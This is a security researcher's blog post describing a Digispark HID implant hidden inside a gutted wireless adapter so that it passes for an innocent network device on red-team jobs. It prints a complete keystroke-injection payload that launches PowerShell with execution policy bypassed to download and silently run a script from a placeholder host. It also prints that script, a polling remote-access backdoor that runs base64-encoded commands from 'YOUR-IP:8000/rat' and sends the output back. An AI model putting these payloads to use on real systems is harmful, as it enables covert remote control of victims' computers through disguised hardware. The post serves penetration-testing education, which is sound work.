David Sopas – Web Security Researcher

December 19, 2019 at 1:24 pm

Make HID great again

Since ever I’ve been using HID devices on red-team assessments at Char49 – specially using Rubber Ducky and latelly with Cactus WHID.
I wanted to play a little more so I’ve picked one of my favourite tools from my arsenal which is the tiny Digispark. This ATTINY85 with 8kb flash memory – became part of most of my assessments. From deap-drops to implants.

My last implant – we can call it HID modding – was to add a Digispark inside a damaged Wireless Adapter. The only components that I left from the original product was the USB connector and the external case.
Before connecting everything, I did a test lab using a old USB connector and the Digipark with soldered pins.

Why? In the past I did found bad PCB prints that misplaced DATA+ with the DATA- (in the Digispark is USB+ and USB-) so before using my shitty soldering skills I created the setup for future HID modding.

I ended up with the following schematics:

Everything was working properly so I added everything inside the Wireless Adapter and used super-glue to close the case.

Now I had a concealed HID device that I can put on a client and make him think is just an innocent network device.

The only part missing is the code. I connected the device to Arduino IDE and uploaded my sketch – which will do the following:

  1. Download a file from my domain using powershell
  2. Execute the ps1 file
  3. Get the reverse shell which pointed to my VPS

Ducky payload (I used duck2spark from mame82 to convert my duck scripts to digispark source):

DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://YOUR-IP/ps.txt',\"file.ps1\")";
ENTER
DELAY 750
STRING cls
ENTER
DELAY 500
STRING powershell -W Hidden .\file.ps1
ENTER

Powershell script:

function getUser() {
	$string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}

function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}

$resp = "http://YOUR-IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
	[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
	$r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);

	while($r_get) {
		$output = invoke-expression $Ds | out-string
		$w.UploadString($resp, $output)
		break
	}
}

I created a small video for educational purposes only – find it here.

The target machine was a fresh and up-to-date Windows 10 Pro install with Windows Defender and Firewall on.

How much did it cost?

Well the only thing was really the Digispark which you can get on Aliexpress for 1 to 3 bucks a piece.

I already have other ideas, like adding Digispark on other “junk” that I have on my “crappy stuff that I should recycle” – RC toys, USB convertors, IP cameras, etc.

To conclude this post, I recently bought Evil Crow Cable and O.MG DemonSeed EDU so I hope to have time to explore these devices.

To learn more about HID, you should follow these talented guys on Twitter – @mame82, @lucabongiorni and @_MG_.
Also I recommend everyone to see the talk from my mate @kripthor regarding the steps on creating UberHid.

Any feedback feel free to ping me on Twitter – @dsopas.

 

 

Hardware , Tips and Tricks # , , , , ,
Share: / / /